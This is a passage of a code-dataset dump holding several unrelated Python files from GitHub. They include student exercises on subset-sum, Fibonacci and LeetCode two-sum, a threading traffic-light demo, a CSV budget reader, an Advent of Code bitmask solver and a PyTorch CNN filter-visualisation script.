self.messageId, mentions,\n embed_id, embed_type, embed_link, embed_title, embed_content, embed_image)\n \n async def send_image(self, image: Union[str, bytes]):\n if isinstance(image, bytes):\n 
image = await self.client.upload_media(image)\n \n return await self.client.web.send_image(self.threadId, image)\n\n async def send_audio(self, audio: bytes):\n return await self.client.send_audio(self.threadId, audio)\n \n # async def send_to_user(self, message: str):\n # return await self.client.web.start_chat([self.uid or self.author.uid], message)\n \n # async def comment_user(self, comment: str):\n # return await self.client.web.comment_user(self.uid or self.author.uid, comment)\n","repo_name":"Alert-Aigul/Amino.ed","sub_path":"aminoed/helpers/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"36238623617","text":"def discover(trig, tries=1000,tolerance=0.0001):#used a similar way like given in class\n for i in range(tries):#this allows us to iterate mutiple times\n t = random.uniform(-math.pi, math.pi)#random number for t from -pi to pi\n f1 = trig[random.randrange(0, len(trig))]#gives a random trig function\n f2 = trig[random.randrange(0, len(trig))]#gives a random trig function\n if f1 != f2:#if f1 and f2 are the same we do not do anything else\n y1 = eval(f1)#we evaluate\n y2 = eval(f2)#we evaluate \n if np.abs(y1-y2)>tolerance:#if they are the same, we return\n print(f1,\" and \",f2,\" are the same\")\n return False\n return True\n\ndef subsetsum(S,last,goal):#modified given subset from class and updated last by -1\n if goal ==0:\n return True, []\n if goal<0 or last<0:\n return False, []\n res, subset = subsetsum(S,last-1,goal-S[last-1])\n if res:\n subset.append(S[last-1])\n return True, subset\n else:\n return subsetsum(S,last-1,goal)\n\ndef partition(S):\n s = 0#we partition and check if our number is even, if it is not, we cannot continue\n for i in range(len(S)):\n s += S[i]\n if s%2 == 0:\n return subsetsum(S, len(S), s/2)\n return False\n\nimport math\nfrom math import *\nfrom mpmath import *\nimport random\nimport numpy as np\ntrig = ['sin(t)','cos(t)','tan(t)','sec(t)','-sin(t)','-cos(t)','-tan(t)','sin(-t)','cos(-t)',\n 'tan(-1*t)','sin(t)/cos(t)','2*sin(t/2)*cos(t/2)','sin(t)*sin(t)','1-(cos(t)*cos(t))','1-cos(2*t)/2','1/cos(t)']\nprint(discover(trig))\nS = [2, 4, 5, 9, 12]\nprint(partition(S))\n","repo_name":"Protogey/CS2302","sub_path":"Lab8.py","file_name":"Lab8.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28780759926","text":"# coding = utf-8\nimport time,threading\n#开启事件\nevent = threading.Event()\ncount = 0\nclass Lighter(threading.Thread):\n def run(self):\n while True:\n global count\n count += 1\n time.sleep(0.4)\n event.set()\n #设置绿灯时间为10s,红灯为10s\n if count>10 and count<=20:\n event.clear()\n print('\\033[41;1m red light ..\\033[0m')\n elif count > 20:\n count = 0\n event.set()\n print('\\033[42;1m green light ..\\033[0m')\n else:\n print('\\033[42;1m green light ..\\033[0m')\n\n\nclass Car(threading.Thread):\n def __init__(self,name):\n super(Car,self).__init__()\n self.name = name\n def run(self):\n time.sleep(0.5)\n if event.is_set():\n print('{} passed the light'.format(self.name))\n else:\n print('{} is waiting the green light'.format(self.name))\n\nl = Lighter()\nl.start()\n#启动50辆车,让他们经过红绿灯\nfor i in range(50):\n time.sleep(1)\n c = Car('car{}'.format(i))\n 
c.start()","repo_name":"zhangminvip/data_structure_python","sub_path":"traffic_light/traffic_light.py","file_name":"traffic_light.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31715211072","text":"def populate_length(cur_length, pre_length, set_length):\n for p in pre_length:\n for s in set_length:\n cur_length[p+s] = cur_length.get(p+s, 0)+pre_length[p]*set_length[s]\n\ndef inverse_score(score):\n if type(score) is str:\n scores = score.split(':')\n return scores[1] + \":\" + scores[0]\n if type(score) is int:\n return 0 - score","repo_name":"patricksong1993/ACEGEN","sub_path":"utils/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"22756426824","text":"\nimport os\nimport csv\n\nfile= r\"C:\\Users\\lanis\\Documents\\Bootcamp\\Homework\\Python_Challenge\\PyBank\\Resources\\budget_data.csv\"\ncsvpath = file\nwith open(csvpath, 'r') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n print(csvreader)\n header= next(csvreader)\n print(header)\n \n Prof_loss=[]\n dates=[]\n for row in csvreader:\n dates.append(row[0])\n Prof_loss.append(float(row[1]))\n print(dates)\n print(Prof_loss)\n num_months=[]\n print(len(dates))\n Net_total= sum(Prof_loss)\n print(\"$\", sum(Prof_loss))\n\n ","repo_name":"MsPoppy/Python_Challenge","sub_path":"PyBank/newtry.py","file_name":"newtry.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"2399854615","text":"\nfrom sr.robot import ( MARKER_TOP, MARKER_BOTTOM, MARKER_SIDE,\n NET_A, NET_B, NET_C )\n\nfrom vectors import cross_product, make_vector, vector_sum\n\n\ndef describe(marker):\n return \"{0} {1}\".format(marker.info.marker_type, marker.info.code)\n\n\ndef describe_all(markers):\n return ', '.join(map(describe, markers))\n\n\ndef get_zone(marker):\n \"\"\"Get the associated corner zone number for the marker.\"\"\"\n\n assert marker.info.marker_type == MARKER_SIDE, \\\n \"Only token side markers have associated corner zones\"\n\n FIRST_TOKEN_MARKER = 32\n\n # Use the fact that the markers are assigned in order to each token,\n # with the first two being top and bottom and the other four being\n # the zones (in ascending order); per the rules.\n zone = ((marker.info.code - FIRST_TOKEN_MARKER) % 6) - 2\n return zone\n\n\ndef is_left_side_token(marker):\n zone = get_zone(marker)\n net = marker.info.token_net\n return (net == NET_A and zone == 3) \\\n or (net == NET_B and zone == 3) \\\n or (net == NET_C and zone == 1)\n\ndef is_right_side_token(marker):\n zone = get_zone(marker)\n net = marker.info.token_net\n return (net == NET_A and zone == 1) \\\n or (net == NET_B and zone == 2) \\\n or (net == NET_C and zone == 2)\n\ndef is_rear_token(marker):\n zone = get_zone(marker)\n net = marker.info.token_net\n return (net == NET_A and zone == 2) \\\n or (net == NET_B and zone == 1) \\\n or (net == NET_C and zone == 3)\n\n\ndef get_direction_to_token_top(marker):\n \"\"\"Return the direction to the top of the token, according to the\n given marker, expressed as a ``WorldVector``.\"\"\"\n kind = marker.info.marker_type\n if kind == MARKER_SIDE:\n return get_direction_to_top(marker)\n\n elif kind == MARKER_TOP:\n return get_direction_out_from_face(marker)\n\n elif kind == MARKER_BOTTOM:\n return 
get_direction_behind_face(marker)\n\n else:\n assert False, \"Unexpected marker type: {0}.\".format(kind)\n\n\ndef get_direction_to_token_front(marker):\n \"\"\"Return the direction to the front of the token, according to the\n given marker, expressed as a ``WorldVector``.\n The front of the token is the one which holds the side marker\n associated with corner 0.\n \"\"\"\n kind = marker.info.marker_type\n if kind in (MARKER_TOP, MARKER_BOTTOM):\n return get_direction_to_top(marker)\n\n elif kind == MARKER_SIDE:\n zone = get_zone(marker)\n if zone == 0:\n return get_direction_out_from_face(marker)\n\n elif is_left_side_token(marker):\n return get_direction_to_left(marker)\n\n elif is_right_side_token(marker):\n return get_direction_to_right(marker)\n\n elif is_rear_token(marker):\n return get_direction_behind_face(marker)\n\n else:\n assert False, \"Unexpected side marker: {0}.\".format(marker.info)\n\n else:\n assert False, \"Unexpected marker type: {0}.\".format(kind)\n\n\ndef get_direction_to_token_left(marker):\n \"\"\"Return the direction to the left of the token, according to the\n given marker, expressed as a ``WorldVector``.\n The left of the token is the one to the left when viewing an\n upright token from above.\n \"\"\"\n kind = marker.info.marker_type\n if kind == MARKER_TOP:\n return get_direction_to_left(marker)\n\n elif kind == MARKER_BOTTOM:\n return get_direction_to_right(marker)\n\n elif kind == MARKER_SIDE:\n zone = get_zone(marker)\n if zone == 0:\n return get_direction_to_right(marker)\n\n elif is_left_side_token(marker):\n return get_direction_out_from_face(marker)\n\n elif is_right_side_token(marker):\n return get_direction_behind_face(marker)\n\n elif is_rear_token(marker):\n return get_direction_to_left(marker)\n\n else:\n assert False, \"Unexpected side marker: {0}.\".format(marker.info)\n\n else:\n assert False, \"Unexpected marker type: {0}.\".format(kind)\n\n\ndef get_direction_out_from_face(marker):\n \"\"\"Returns the direction out from the marker towards the viewer,\n expressed as a ``WorldVector``.\"\"\"\n\n to_top = get_direction_to_top(marker)\n to_right = get_direction_to_right(marker)\n\n return cross_product(to_top, to_right)\n\n\ndef get_direction_behind_face(marker):\n \"\"\"Returns the direction away behind a marker,\n expressed as a ``WorldVector``.\"\"\"\n\n to_top = get_direction_to_top(marker)\n to_right = get_direction_to_right(marker)\n\n return cross_product(to_right, to_top)\n\n\n# The following just use the direction vectors from one corner to another.\n# In an attempt to smooth any errors due to low resolution, we sum the\n# values from parallel edges of the marker in each case.\n\ndef get_direction_to_top(marker):\n \"\"\"Returns the direction from the bottom to the top of the marker,\n expressed as a ``WorldVector``.\"\"\"\n\n top_left, top_right, bottom_right, bottom_left = marker.vertices\n\n up_left = make_vector(bottom_left.world, top_left.world)\n up_right = make_vector(bottom_right.world, top_right.world)\n\n return vector_sum(up_left, up_right)\n\ndef get_direction_to_left(marker):\n \"\"\"Returns the direction from the left to the right of the marker,\n expressed as a ``WorldVector``.\"\"\"\n\n top_left, top_right, bottom_right, bottom_left = marker.vertices\n\n along_top = make_vector(top_right.world, top_left.world)\n along_bottom = make_vector(bottom_right.world, bottom_left.world)\n\n return vector_sum(along_top, along_bottom)\n\n\ndef get_direction_to_right(marker):\n \"\"\"Returns the direction from the right to the right 
of the marker,\n expressed as a ``WorldVector``.\"\"\"\n\n top_left, top_right, bottom_right, bottom_left = marker.vertices\n\n along_top = make_vector(top_left.world, top_right.world)\n along_bottom = make_vector(bottom_left.world, bottom_right.world)\n\n return vector_sum(along_top, along_bottom)\n","repo_name":"srobo/arena","sub_path":"comp16/token-check/marker_helpers.py","file_name":"marker_helpers.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"18202983123","text":"\"\"\"\nhttps://leetcode.com/problems/two-sum-ii-input-array-is-sorted/\n\nGiven an array of integers that is already sorted in ascending order, find two numbers such that they add up to a specific target number.\n\nThe function twoSum should return indices of the two numbers such that they add up to the target, where index1 must be less than index2.\n\nNote:\n\nYour returned answers (both index1 and index2) are not zero-based.\nYou may assume that each input would have exactly one solution and you may not use the same element twice.\nExample:\n\nInput: numbers = [2,7,11,15], target = 9\nOutput: [1,2]\nExplanation: The sum of 2 and 7 is 9. Therefore index1 = 1, index2 = 2.\n\"\"\"\nfrom typing import List\nfrom bisect import bisect_left\n\nfrom Common.ObjectTestingUtils import run_functional_tests\n\n\"\"\"\nRuntime: 100 ms, faster than 26.85% of Python3 online submissions for Two Sum II - Input array is sorted.\nMemory Usage: 14.3 MB, less than 45.82% of Python3 online submissions for Two Sum II - Input array is sorted.\n\"\"\"\nclass Solution:\n def twoSum(self, numbers: List[int], target: int) -> List[int]:\n for i in range(len(numbers)):\n t2 = target - numbers[i]\n j = bisect_left(numbers, t2, i+1)\n if j != len(numbers) and numbers[j] == t2:\n return [i+1, j+1]\n\n\ntests = [\n [[2,7,11,15], 9, [1, 2]]\n]\n\nrun_functional_tests(Solution().twoSum, tests)\n\n","repo_name":"wtain/LeetCodePython","sub_path":"Algorithms/Basic/BinarySearch/NSum/TwoSum2_InputArrayIsSorted.py","file_name":"TwoSum2_InputArrayIsSorted.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"17329373528","text":"cube = lambda x: x ** 3 # complete the lambda function \n\ndef fibonacci(n):\n if n == 0:\n return []\n elif n == 1:\n return [0]\n elif n == 2:\n return [0, 1]\n else:\n fibs = fibonacci(n - 1)\n fibs.append(fibs[-1] + fibs[-2])\n return fibs\nif __name__ == '__main__':\n n = int(input())\n print(list(map(cube, fibonacci(n))))\n","repo_name":"BARarch/My-Hackerranks","sub_path":"map180814.py","file_name":"map180814.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"7239799534","text":"#!/usr/bin/python3\n\n\ndef read_input(filename):\n read = []\n lines=open(filename, \"r\")\n for i in lines:\n #read.append(i.strip())\n #read.append(int(i.strip()))\n read.append(i.strip().split(' = '))\n return read\n\ndef int2bit(i, mask=None):\n bit = '{0:036b}'.format(int(i))\n b = ''\n if mask is not None:\n for x in range( len(bit)):\n if mask[x] != 'X':\n b = b+mask[x]\n else:\n b = b+bit[x]\n return b\n\ndef bit2int(b):\n return int(b,2)\n\nif __name__ == '__main__':\n f = read_input(\"input\")\n mask = ''\n mem = dict()\n for line in f:\n if line[0] == 'mask':\n mask = line[1]\n print(line)\n elif line[0][0:3] == 'mem':\n 
mem.update({line[0][4:-1]: int2bit(line[1], mask)})\n print(mem)\n sum = 0\n for i, j in mem.items():\n sum += bit2int(j)\n print(sum)\n","repo_name":"JackMcCrack/adventofcode2020","sub_path":"day14/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"18498848159","text":"def solution(array, commands):\n answer = []\n arr = []\n\n for i in range(len(commands)):\n for j in range(commands[i][0] - 1, commands[i][1], 1):\n arr.append(array[j])\n arr.sort()\n answer.append(arr[commands[i][2] - 1])\n del arr[:]\n\n return answer\n\n\nprint(solution([1, 5, 2, 6, 3, 7, 4], [[2, 5, 3], [4, 4, 1], [1, 7, 3]]))\n","repo_name":"Junbro0708/OpenCV_Python","sub_path":"Python/Basic/07_NumOfK.py","file_name":"07_NumOfK.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"8700520984","text":"#%%\nimport os\nimport sys\nimport cv2\nimport json\nimport math\nimport copy\nimport numpy as np\nimport pandas as pd\nimport torch \n# print(torch.__version__)\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\nimport torchvision.models as models\nimport PIL\nfrom PIL import Image\n# import matplotlib\n# matplotlib.use(\"AGG\")\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as mpl_color_map\nfrom torchsummary import summary\nimport flashtorch\nfrom flashtorch.saliency import Backprop\nimport seaborn as sns\nfrom torch.autograd import Variable\n\n#%%\nclass CNN(nn.Module):\n def __init__(self, input_shape=(1,48,48), conv1_filters=96, conv2_filters=256, conv3_filters=256, num_units=256, dropout=0.5, num_classes=7):\n super(CNN, self).__init__()\n self.conv_base = nn.Sequential(\n nn.Conv2d(1, conv1_filters, kernel_size=5, stride=2, padding=2, bias=False),\n nn.BatchNorm2d(conv1_filters),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=1),\n\n nn.Conv2d(conv1_filters, conv2_filters, kernel_size=5, stride=2, padding=2, bias=False),\n nn.BatchNorm2d(conv2_filters),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=1),\n\n nn.Conv2d(conv2_filters, conv3_filters, kernel_size=5, stride=2, padding=2, bias=False),\n nn.BatchNorm2d(conv3_filters),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=1),\n )\n \n n_size = self._get_conv_output(input_shape)\n\n self.fc_base = nn.Sequential(\n nn.Dropout(p=dropout),\n nn.Linear(n_size, num_units),\n nn.ReLU(inplace=True),\n\n nn.Dropout(p=dropout),\n nn.Linear(num_units, num_units),\n nn.ReLU(inplace=True),\n )\n\n def _get_conv_output(self, shape):\n bs = 1\n inp = torch.rand(bs, *shape)\n out = self._forward_features(inp)\n return int(np.prod(out.size()[1:]))\n \n def _forward_features(self, x):\n x = self.conv_base(x)\n return x\n \n def forward(self, x):\n x = self.conv_base(x)\n x = x.view(x.size(0), -1)\n x = self.fc_base(x)\n return x\n\nclass train_hw3(Dataset):\n\n def __init__(self, data_dir, label, transform):\n self.data_dir = data_dir\n self.label = label\n self.transform = transform\n \n def __getitem__(self, index):\n pic_file = '{:0>5d}.jpg'.format(self.label[index][0])\n img = cv2.imread(os.path.join(self.data_dir, pic_file), cv2.IMREAD_GRAYSCALE)\n img = np.expand_dims(img, 0)\n return torch.FloatTensor(img), self.label[index, 1]\n # img = Image.open(os.path.join(self.data_dir, 
pic_file)).convert('RGB')\n # img = self.transform(img)\n # return img, self.label[index, 1]\n\n def __len__(self):\n return self.label.shape[0]\n\nclass test_hw3(Dataset):\n\n def __init__(self, data_dir, sample_submission, transform):\n self.data_dir = data_dir\n self.name = pd.read_csv(sample_submission).to_numpy()\n self.transform = transform\n \n def __getitem__(self, index):\n pic_file = '{:0>4d}.jpg'.format(self.name[index][0])\n img = cv2.imread(os.path.join(self.data_dir, pic_file), cv2.IMREAD_GRAYSCALE)\n img = np.expand_dims(img, 0)\n return torch.FloatTensor(img)\n # img = Image.open(os.path.join(self.data_dir, pic_file)).convert('RGB')\n # img = self.transform(img)\n # return img\n\n def __len__(self):\n return self.name.shape[0]\n\ndef train_valid_split(X, y=None, valid_size=0.2, random_state=42):\n n_train = int((1 - valid_size) * len(X))\n n_test = len(X) - n_train\n n_samples = len(X)\n\n rng = np.random.RandomState(random_state)\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:(n_test + n_train)]\n\n X_train = X[ind_train]\n X_valid = X[ind_test]\n if y is not None:\n y_train = y[ind_train]\n y_valid = y[ind_test]\n return X_train, X_valid, y_train, y_valid\n else:\n return X_train, X_valid\n#%%\n\nuse_cuda = torch.cuda.is_available()\nDEVICE = torch.device('cuda' if use_cuda else 'cpu')\nprint(\"Device:\", DEVICE)\n\n#%%\ntrain_img_dir = \"data/train_img\"\ntrain_csv = \"data/train.csv\"\ntest_img_dir = \"data/test_img\"\nsample_submission = \"data/sample_submission\"\noutput_csv = \"./pred.csv\"\n#%%\nmodel_pth = \"jobs/CNN_3_model/model/max_val_acc.pkl\"\n\nmodel = CNN(input_shape=(1,48,48), conv1_filters=64, conv2_filters=128, conv3_filters=512, num_units=64, dropout=0.5, num_classes=7)\nmodel.load_state_dict(torch.load(model_pth, map_location=DEVICE))\nmodel.eval()\n#%%\nprint(model.conv_base[8].weight.cpu().detach().clone().shape)\n\n# %%\nlabels = pd.read_csv(train_csv).to_numpy()\ntrain_label, valid_label = train_valid_split(labels, valid_size=2000/len(labels), random_state=77)\n\n# %%\ntransform = transforms.Compose([\n # transforms.RandomAffine(15, translate=(0.1,0.1), scale=(0.9,1.1), shear=10, fillcolor=0),\n # transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n #transforms.Normalize([mean], [std], inplace=False)\n ])\n\ntrain_dataset = train_hw3(train_img_dir, train_label, transform)\nvalid_dataset = train_hw3(train_img_dir, valid_label, transform)\ntrain_loader = DataLoader(train_dataset, batch_size=64) \nvalid_loader = DataLoader(valid_dataset, batch_size=512) \n\n\n#%%\n# visualize all filters (filter weight)\nkernels = model.conv_base[8].weight.cpu().detach().clone()\nkernels = kernels - kernels.min()\nkernels = kernels / kernels.max()\n\n# %%\ndef vistensor(tensor, ch=0, allkernels=False, nrow=8, padding=1): \n '''\n vistensor: visuzlization tensor\n @ch: visualization channel \n @allkernels: visualization all tensores\n ''' \n \n n,c,w,h = tensor.shape\n if allkernels: tensor = tensor.view(n*c,-1,w,h )\n elif c != 3: tensor = tensor[:,ch,:,:].unsqueeze(dim=1)\n \n rows = np.min( (tensor.shape[0]//nrow + 1, 64 ) ) \n grid = utils.make_grid(tensor, nrow=nrow, normalize=True, padding=padding)\n plt.figure( figsize=(nrow,rows) )\n plt.imshow(grid.numpy().transpose((1, 2, 0)))\n # plt.savefig(\"./plot/kernel.png\")\n plt.show()\n\n#%%\nik = 8\nkernel = model.conv_base[ik].weight.data.clone()\nprint(kernel.shape)\nvistensor(kernel, ch=0, nrow=16, allkernels=False)\n\n# %%\ndef 
convert_to_grayscale(im_as_arr):\n \"\"\"\n Converts 3d image to grayscale\n Args:\n im_as_arr (numpy arr): RGB image with shape (D,W,H)\n returns:\n grayscale_im (numpy_arr): Grayscale image with shape (1,W,D)\n \"\"\"\n grayscale_im = np.sum(np.abs(im_as_arr), axis=0)\n im_max = np.percentile(grayscale_im, 99)\n im_min = np.min(grayscale_im)\n grayscale_im = (np.clip((grayscale_im - im_min) / (im_max - im_min), 0, 1))\n grayscale_im = np.expand_dims(grayscale_im, axis=0)\n return grayscale_im\n\n\ndef save_gradient_images(gradient, file_name):\n \"\"\"\n Exports the original gradient image\n Args:\n gradient (np arr): Numpy array of the gradient with shape (3, 224, 224)\n file_name (str): File name to be exported\n \"\"\"\n if not os.path.exists('./results'):\n os.makedirs('./results')\n # Normalize\n gradient = gradient - gradient.min()\n gradient /= gradient.max()\n # Save image\n path_to_file = os.path.join('./results', file_name + '.jpg')\n save_image(gradient, path_to_file)\n\n\ndef save_class_activation_images(org_img, activation_map, file_name):\n \"\"\"\n Saves cam activation map and activation map on the original image\n Args:\n org_img (PIL img): Original image\n activation_map (numpy arr): Activation map (grayscale) 0-255\n file_name (str): File name of the exported image\n \"\"\"\n if not os.path.exists('./results'):\n os.makedirs('./results')\n # Grayscale activation map\n heatmap, heatmap_on_image = apply_colormap_on_image(org_img, activation_map, 'hsv')\n # Save colored heatmap\n path_to_file = os.path.join('./results', file_name+'_Cam_Heatmap.png')\n save_image(heatmap, path_to_file)\n # Save heatmap on iamge\n path_to_file = os.path.join('./results', file_name+'_Cam_On_Image.png')\n save_image(heatmap_on_image, path_to_file)\n # SAve grayscale heatmap\n path_to_file = os.path.join('./results', file_name+'_Cam_Grayscale.png')\n save_image(activation_map, path_to_file)\n\n\ndef apply_colormap_on_image(org_im, activation, colormap_name):\n \"\"\"\n Apply heatmap on image\n Args:\n org_img (PIL img): Original image\n activation_map (numpy arr): Activation map (grayscale) 0-255\n colormap_name (str): Name of the colormap\n \"\"\"\n # Get colormap\n color_map = mpl_color_map.get_cmap(colormap_name)\n no_trans_heatmap = color_map(activation)\n # Change alpha channel in colormap to make sure original image is displayed\n heatmap = copy.copy(no_trans_heatmap)\n heatmap[:, :, 3] = 0.4\n heatmap = Image.fromarray((heatmap*255).astype(np.uint8))\n no_trans_heatmap = Image.fromarray((no_trans_heatmap*255).astype(np.uint8))\n\n # Apply heatmap on iamge\n heatmap_on_image = Image.new(\"RGBA\", org_im.size)\n heatmap_on_image = Image.alpha_composite(heatmap_on_image, org_im.convert('RGBA'))\n heatmap_on_image = Image.alpha_composite(heatmap_on_image, heatmap)\n return no_trans_heatmap, heatmap_on_image\n\n\ndef format_np_output(np_arr):\n \"\"\"\n This is a (kind of) bandaid fix to streamline saving procedure.\n It converts all the outputs to the same format which is 3xWxH\n with using sucecssive if clauses.\n Args:\n im_as_arr (Numpy array): Matrix of shape 1xWxH or WxH or 3xWxH\n \"\"\"\n # Phase/Case 1: The np arr only has 2 dimensions\n # Result: Add a dimension at the beginning\n if len(np_arr.shape) == 2:\n np_arr = np.expand_dims(np_arr, axis=0)\n # Phase/Case 2: Np arr has only 1 channel (assuming first dim is channel)\n # Result: Repeat first channel and convert 1xWxH to 3xWxH\n if np_arr.shape[0] == 1:\n np_arr = np.repeat(np_arr, 3, axis=0)\n # Phase/Case 3: Np arr is of 
shape 3xWxH\n # Result: Convert it to WxHx3 in order to make it saveable by PIL\n if np_arr.shape[0] == 3:\n np_arr = np_arr.transpose(1, 2, 0)\n # Phase/Case 4: NP arr is normalized between 0-1\n # Result: Multiply with 255 and change type to make it saveable by PIL\n if np.max(np_arr) <= 1:\n np_arr = (np_arr*255).astype(np.uint8)\n return np_arr\n\n\ndef save_image(im, path):\n \"\"\"\n Saves a numpy matrix or PIL image as an image\n Args:\n im_as_arr (Numpy array): Matrix of shape DxWxH\n path (str): Path to the image\n \"\"\"\n if isinstance(im, (np.ndarray, np.generic)):\n im = format_np_output(im)\n im = Image.fromarray(im)\n im.save(path)\n\n\ndef preprocess_image(pil_im, resize_im=True):\n \"\"\"\n Processes image for CNNs\n Args:\n PIL_img (PIL_img): Image to process\n resize_im (bool): Resize to 224 or not\n returns:\n im_as_var (torch variable): Variable that contains processed float tensor\n \"\"\"\n # mean and std list for channels (Imagenet)\n # mean = [0.485, 0.456, 0.406]\n # std = [0.229, 0.224, 0.225]\n # Resize image\n if resize_im:\n pil_im.thumbnail((224, 224))\n im_as_arr = np.float32(pil_im)\n # print(im_as_arr.shape)\n im_as_arr = im_as_arr.transpose(2, 0, 1) # Convert array to D,W,H\n # Normalize the channels\n for channel, _ in enumerate(im_as_arr):\n im_as_arr[channel] /= 255\n # im_as_arr[channel] -= mean[channel]\n # im_as_arr[channel] /= std[channel]\n # Convert to float tensor\n im_as_ten = torch.from_numpy(im_as_arr).float()\n # Add one more channel to the beginning. Tensor shape = 1,3,224,224\n im_as_ten.unsqueeze_(0)\n # Convert to Pytorch variable\n im_as_var = Variable(im_as_ten, requires_grad=True)\n return im_as_var\n\n\ndef recreate_image(im_as_var):\n \"\"\"\n Recreates images from a torch variable, sort of reverse preprocessing\n Args:\n im_as_var (torch variable): Image to recreate\n returns:\n recreated_im (numpy arr): Recreated image in array\n \"\"\"\n # reverse_mean = [-0.485, -0.456, -0.406]\n # reverse_std = [1/0.229, 1/0.224, 1/0.225]\n recreated_im = copy.copy(im_as_var.data.numpy()[0])\n # print(im_as_var.shape)\n # for c in range(im_as_var.shape[1]):\n # recreated_im[c] /= reverse_std[c]\n # recreated_im[c] -= reverse_mean[c]\n recreated_im[recreated_im > 1] = 1\n recreated_im[recreated_im < 0] = 0\n recreated_im = np.round(recreated_im * 255)\n\n recreated_im = np.uint8(recreated_im).transpose(1, 2, 0) # W,H,C\n if recreated_im.shape[2] == 3:\n return recreated_im\n return recreated_im.reshape(recreated_im.shape[1], recreated_im.shape[1])\n\n\n#%%\nclass SaveFeatures():\n def __init__(self, module):\n self.hook = module.register_forward_hook(self.hook_fn)\n def hook_fn(self, module, input, output):\n self.features = torch.tensor(output,requires_grad=True).to(DEVICE)\n def close(self):\n self.hook.remove()\n\nclass FilterVisualizer():\n def __init__(self, model, size=56, upscaling_steps=12, upscaling_factor=1.2, ch=1):\n self.size, self.upscaling_steps, self.upscaling_factor = size, upscaling_steps, upscaling_factor\n self.model = model\n self.ch = ch\n def visualize(self, layer, filter, lr=0.1, opt_steps=20, blur=None):\n sz = self.size\n img = np.uint8(np.random.uniform(150, 180, (sz, sz, self.ch))) # generate random image\n activations = SaveFeatures(list(self.model.children())[layer]) # register hook\n # processed_image = preprocess_image(img, False)\n\n for _ in range(self.upscaling_steps): # scale the image up upscaling_steps times\n img = img.reshape(sz,sz,self.ch)\n img_var = preprocess_image(img, False)\n optimizer = 
torch.optim.Adam([img_var], lr=lr, weight_decay=1e-6)\n for n in range(opt_steps): # optimize pixel values for opt_steps times\n optimizer.zero_grad()\n self.model(img_var)\n loss = -activations.features[0, filter].mean()\n loss.backward()\n optimizer.step()\n img = recreate_image(img_var)\n self.output = img\n sz = int(self.upscaling_factor * sz) # calculate new image size\n img = cv2.resize(img, (sz, sz), interpolation = cv2.INTER_CUBIC) # scale image up\n if blur is not None: img = cv2.blur(img,(blur,blur)) # blur image to reduce high frequency patterns\n # print(self.output.shape)\n self.save(layer, filter)\n activations.close()\n \n def save(self, layer, filter):\n # plt.imsave(\"layer_\"+str(layer)+\"_filter_\"+str(filter)+\".jpg\", np.clip(self.output, 0, 1))\n plt.imsave(\"layer_\"+str(layer)+\"_filter_\"+str(filter)+\".png\", self.output)\n#%%\nlayer = 8\nfilter = 414\n\nFV = FilterVisualizer(model=model.conv_base, size=48, ch=1, upscaling_steps=3, upscaling_factor=1.2)\nFV.visualize(layer, filter, blur=1)\n\nimg = PIL.Image.open(\"layer_\"+str(layer)+\"_filter_\"+str(filter)+\".png\")\nplt.imshow(np.array(img))\nplt.show()\n\n\n\n\n\n#%%\nimg = PIL.Image.open(\"data/train_img/00037.jpg\")\nimg = transform(img).reshape(1,1,48,48).to(DEVICE)\n# img.numpy().reshape(48,48,1)\nplt.imshow(img.numpy().reshape(48,48), cmap='gray')\nplt.show()\n\n\n# %%\ncnn_layer = 8\nactivations = SaveFeatures(model.conv_base[cnn_layer])\nmodel.conv_base(img)\n# %%\ntotal_filters_in_layer = 512\nmean_act = [activations.features[0,i].mean().item() for i in range(total_filters_in_layer)]\n\nprint(\"max act:\", np.argmax(mean_act))\n\nthresh = 0.46\nfilter_pos_over_thresh = [i for i in range(total_filters_in_layer) if mean_act[i]>thresh]\nprint(f\"act > thresh({thresh})\", filter_pos_over_thresh)\n\n#%%\nfilter_pos = np.argmax(mean_act)\nplt.figure(figsize=(7,5))\nact = plt.plot(mean_act,linewidth=2.)\nextraticks=[filter_pos]\nax = act[0].axes\nax.set_xlim(0,500)\nplt.axvline(x=filter_pos, color='grey', linestyle='--')\nax.set_xlabel(\"feature map\")\nax.set_ylabel(\"mean activation\")\nax.set_xticks([0,200,400] + extraticks)\nplt.show()\n\n# %%\n","repo_name":"TSLsun/ML2019FALL","sub_path":"hw3/plot/plot_filter_activations.py","file_name":"plot_filter_activations.py","file_ext":"py","file_size_in_byte":16352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14458538445","text":"# coding=utf-8\nimport numpy as 